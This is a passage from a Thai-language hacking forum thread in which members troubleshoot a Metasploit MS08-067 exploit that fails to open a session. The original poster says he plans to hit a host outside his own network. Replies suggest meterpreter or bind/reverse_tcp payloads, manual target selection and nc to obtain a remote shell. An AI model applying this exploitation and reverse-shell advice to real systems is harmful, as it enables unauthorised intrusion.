Page 1 of 2 12 LastLast
Results 1 to 10 of 19

Thread: ขอสอบถามครับเรื่องexploits

  1. 25-11-2009, 09:17 PM #1
    kenghockey
    kenghockey is offline
    Member
    Join Date
    May 2009
    Location
    thai
    Posts
    45

    คือว่าผมต้องการสอบถามเรื่องการexploitsโดยใช้msfconsole windows/smb/ms08_067_netapi คือผมได้set payload ให้เป็นwindows/vncinject/reverse_tcp ส่วนการset lhost 192.168.1.3คือเครื่องlocalในวงแลน แต่ผมจะexploitไปนอกเครือข่าย โโยสมมุติจะexploitไป xxx.xxx.xxx.xxx คือrhost นั้นเอง ส่วนเรื่องของrport ที่เป็นดีฟอลคือ445 และlport 4444 เป็นดีฟอลเช่นกันเริ่มการexploit มันจะทําการexploit โดยtarget ผมได้ตั้งเป็น0เพื่อที่จะให้มันทําการdetect os windows verion เอง แต่ข้อสงสัยที่จะตามคือ มันขึ้นมาว่าexploit complete but no session was created มันคืออะไรและต้องทําอย่างไร และการexploit ไปนอกเครือข่ายคือเราต้องทําการforword เร้าเตอร์ไหมครับเพราะผมได้ทดลองexploit ไปเครื่องที่เป็นwindows xp sp2 แต่มันขึ้นconnect time out เพราะที่หาข้อมูลของport smb หรือport 445 นั้น เป็นportที่จําเป็นต้องเปิด เพื่อการติดต่อกับserver clientในการใช้internet
    [*] Started reverse handler on port 4444[*] Trying target Windows XP SP2...[*] Done.[*] Exploit completed, but no session was created.

    เนี่ยล่ะครับ ทุกอย่างได้หมดแต่ มันบอกว่าExploit completed, but no session was created มันคืออะไรครับ
    Reply With Quote Reply With Quote
  2. 25-11-2009, 10:45 PM #2
    materaj
    materaj is offline
    Junior Member
    Join Date
    Mar 2008
    Posts
    21

    น่าจะเป็น
    1. use exploit/multi/handler
    2. set PAYLOAD windows/meterpreter/reverse_tcp

    ที่เหลือลองศึกษาดูเองครับ
    Reply With Quote Reply With Quote
  3. 25-11-2009, 10:59 PM #3
    kenghockey
    kenghockey is offline
    Member
    Join Date
    May 2009
    Location
    thai
    Posts
    45

    ไม่ใช่ครับคือผมสงสัยตรงที่ว่าทําไมมันบอกว่า exploit complete but no session was created เพราะในเมื่อมันpassหมดทุกอย่างแล้วแต่ก้ไม่สามารถเข้าไปใช้ในส่วนที่ต้องการได้ที่ใช้payload
    Reply With Quote Reply With Quote
  4. 26-11-2009, 12:29 AM #4
    lucifer
    lucifer is offline
    Jedi Global Moderator
    Join Date
    Oct 2007
    Location
    Bangkok, TH
    Posts
    327

    เพราะมันยิง exploit ได้สำเร็จแล้ว แต่มันไม่สามารถ Open Tunnel สำหรับ spawn payload ดังกล่าวได้ เป็นไปได้ว่า payload ที่ใช้กับ OS นั้นๆ มันมีขนาดใหญ่เกิน Buffer ที่ถูกกำหนดไว้สำหรับ OS นั้นๆ ลองเปลี่ยน payload ดูใหม่ เช่น reverse_tcp หรือ bind_tcp อาจได้ command shell กลับมาก็ได้ครับ

    อีกอย่างสำหรับช่องโหว่ MS08-067 ใน MSF มันจะ Automatic เลือก target ให้เรา ซึ่งบางทีมันก็ไม่ได้ถูกเสมอไป เราลองเลือกกำหนดเองไปดูครับ

    <div align="center"><span style="font-family:Tahoma"><span style="color:#3333FF"><div align="center">-= CWH Underground Vulnerabilities Disclosure =-</div></span></span>

    Be Safe,
    /0x5A655133754C

    Send All Submission to lucifer[at]citec.us

    ----------------------------------------------------------------------------------------
    <span style="color:gray">`Hacking isn&#39;t about helping the security industry, Which leeches from Hacker`
    Reply With Quote Reply With Quote
  5. 26-11-2009, 10:03 AM #5
    materaj
    materaj is offline
    Junior Member
    Join Date
    Mar 2008
    Posts
    21

    ผมยังไม่ได้ลองเหมือนกันครับ โทษที ถ้าที่แนะนำไปมันใช้ไม่ได้

    พยายามลองหาวิธีเปิด PORT แล้วใช้ nc เข้าไปแทนดูครับ

    Reply With Quote Reply With Quote
  6. 26-11-2009, 11:18 AM #6
    kenghockey
    kenghockey is offline
    Member
    Join Date
    May 2009
    Location
    thai
    Posts
    45

    คือตอนนี้ผมได้เปลี่ยน payload ไปเรื่อยจะหมดแล้วล่ะครับ แต่มันก็บอกว่า but no session was created
    แต่ส่วนเรื่องของ การที่จะ exploit ออกไปIP อื่นๆ ที่อยู่นอกเครือข่าย ผมไม่แน่ใจว่าport 445 ทุกเครื่องจะเปิดใช้ไหม
    เพราะเฆ้นขึ้น connect time out มันเชื่อมต่อไม่ได้

    Reply With Quote Reply With Quote
  7. 26-11-2009, 02:57 PM #7
    materaj
    materaj is offline
    Junior Member
    Join Date
    Mar 2008
    Posts
    21

    เมื่อกี๊ผมลองโดยใช้ vmware(ทั้ง BT4และ WindowsXP SP3) ก็สามารถ exploit ได้ปกตินะครับ คือผมใช้ payload เป็น windows/meterpreter/reverse_tcp น่ะครับ
    Reply With Quote Reply With Quote
  8. 26-11-2009, 03:04 PM #8
    kenghockey
    kenghockey is offline
    Member
    Join Date
    May 2009
    Location
    thai
    Posts
    45

    คือตรงนี้ ของคุณใช้vmware แต่ของผม ใช้ ิbt4 โดย boot for usb ครับ เกี่ยวกันไหมถ้าใช้usb และอีกอันที่ผมลองใใช้คือ windows xp sp3 แล้วโหลด metasploit framework 3.3 มาใช้ก็but no session was created

    แต่ที่คุณใช้ meterpreter/reverse_tcp สามารถexploitไปที่windows xp sp 3ได้ไหมครับ หรือได้แค่sp2 พอที่ดู มันได้แค่sp2 แต่ในที่set มันมีให้set target 4 คือ sp3นั้นเอง
    Reply With Quote Reply With Quote
  9. 26-11-2009, 03:07 PM #9
    materaj
    materaj is offline
    Junior Member
    Join Date
    Mar 2008
    Posts
    21

    ผมทดลองกับ Windows XP SP3 ครับ ไม่ได้ลองกับ SP2 ครับ

    แต่ของผม มันเป็น Version ตั้งแต่ประมาณเมษาที่ผ่านมาน่ะ ครับ แล้วไม่ได้อัพเดตเพิ่มเติมเลยครับ
    Reply With Quote Reply With Quote
  10. 26-11-2009, 03:14 PM #10
    kenghockey
    kenghockey is offline
    Member
    Join Date
    May 2009
    Location
    thai
    Posts
    45

    ตรงนี้ but no session was created มันมี ข้อผิดพลาดที่เกิดจากเครื่องเรารึป่าวอันนี้ไม่ทราบเหมือนกัน ของคุณ ใช้ เป็น ms08_067_netapi เหมือนกันใช่ไหม
    Reply With Quote Reply With Quote
Page 1 of 2 12 LastLast
« Previous Thread | Next Thread »

Members who have read this thread : 0

Actions : (View-Readers)

There are no names to display.

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Forum Rules

Hide Hack By vFCoders